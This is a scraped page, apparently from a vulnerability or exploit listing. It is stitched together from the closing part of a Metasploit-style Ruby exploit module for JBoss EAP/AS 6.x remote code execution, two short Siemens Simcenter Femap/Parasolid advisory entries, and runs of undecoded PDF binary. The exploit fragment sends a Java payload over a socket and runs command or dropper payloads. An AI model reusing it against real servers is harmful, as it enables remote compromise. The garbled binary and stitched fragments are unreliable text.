magic_bytes + java_payload.byteslice(4..)    connect    sock.put(handshake_data)    sock.get_once(16)    sock.put(payload)    disconnect    print_good('Successfully sent payload')  rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError => e    fail_with(Failure::Unreachable, e.message)  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager    end  endend

JBOSS EAP/AS 6.x Remote Code Execution

A vulnerability has been identified in Simcenter Femap (All versions < V2022.2). The affected application contains an out of bounds write past the end of an allocated structure while parsing specially crafted X_T files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-17293)

%PDF-1.5 %���� 53 0 obj << /Length 2639 /Filter /FlateDecode >> stream xڵZ�s۸�\_��R31B|D�/>���'�%����t��9�D�Q��.J$E1���\`�\\���b��K޳x�.~Z\\�~+���Y�-�<�(=�5�Ty���şg�:ݔ�K�"�&u1���Ϫ�-�j�=+s ��w��3���L�T��:��of0z1�m�������

CVE-2022-34748

A vulnerability has been identified in Parasolid V33.1 (All versions), Parasolid V34.0 (All versions < V34.0.250), Parasolid V34.1 (All versions < V34.1.233), Simcenter Femap (All versions). The affected application contains an out of bounds read past the end of an allocated structure while parsing specially crafted NEU files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-15420)

%PDF-1.5 %���� 59 0 obj << /Length 2488 /Filter /FlateDecode >> stream x���r�8�����j#ؗ�\\ܱ�JO'�XrRS�>�%�fE5$'�e��i�����o�@�F8z{�����%בAFR͖��HK)c� \*�-�/�4K�馜�R��i:��S"����߲2�I��0�ׄ�ǭ�WE��ͫ7�X=��9���bv��< �b$��O������-ݻ���g0^Eӓ��@T�ۂi�SB"��L͑Q|��G��0d�RM ��ԁAӳS�#��!ADD��� �� �F�10(��!,0�u���l���n(�|ߐĴs�1r�� L���ƴ���գ���B�����j�㨀)�@1!�\`\\t4��D�x�ڤE�W���u@��\`���:�(\]�H+3D�ƅhӑmz�Ir�X�bj��!����R���tS��!��iD�Q��\\"jF1��dL��/�u����D�> wL�Q�G :�4�$��{�Y���,�bP⠪����\`A�і�H�|����qtJ�lxؿs1n�͓\*�7>��'U���4���S�N ���vB��q�O����.�.�ybכ\]Q�����&�iQ�鰛M�O��z�}�N��o?�5)���yaPR� �Ge!93(��:�X�Ц!��2�bz�����D�����.����@� ���lݲ\\��/'���ܣ�-7��p��H��ܿ/�0X.��y��W \_�r���\*�aQ��,J?�q���ߜ7w���$@��U}�ÁŕM�d��ަE���l/��$(����:�$N� �nJ ��0��UZ��,��pq��6��2^'E��\[��gWzN��� �����W�4�Ax���|\[c��@1�w�Gˣx�Uw\]������U ����J��M~8�z!j'U�4�-�l-X��s�6>ަ~�� ���Űn������:��y�0S��=R� 6X�m:G�s�r��{��ɘ�� �I���\`�~3�Mϱ-�yZ:�  9�߄� ۀ�/�X���%nꞮR�!?�sn,�ZN����xn �M'+?o� /j����/�A�t�A�| ,��d��G��<�0���T����+��FH�L{�je�.N�M�j�Y���6 ٦�\[ڂ�c{v�E��x��A�x.��<��?�Ϡ������\]Q�XZ�;~:�:J\`�����@�P;�"��!xH��M^��G����>���ǥ$\[%>�{��P� �D���P6"V���Ǌ��ˋ7���j�dY���P7R�Wg1�����!o��R���յe���7�i\_�Ճ>�#\]�8��La�&��C�)ň�8�̡3Fq"�!n�q�ڈO?�~3{��C��Z�G!9�H����1��s�����B0�PP��XYw>������6��\\��!�ىic�)�m R.�h���

Tag

#pdf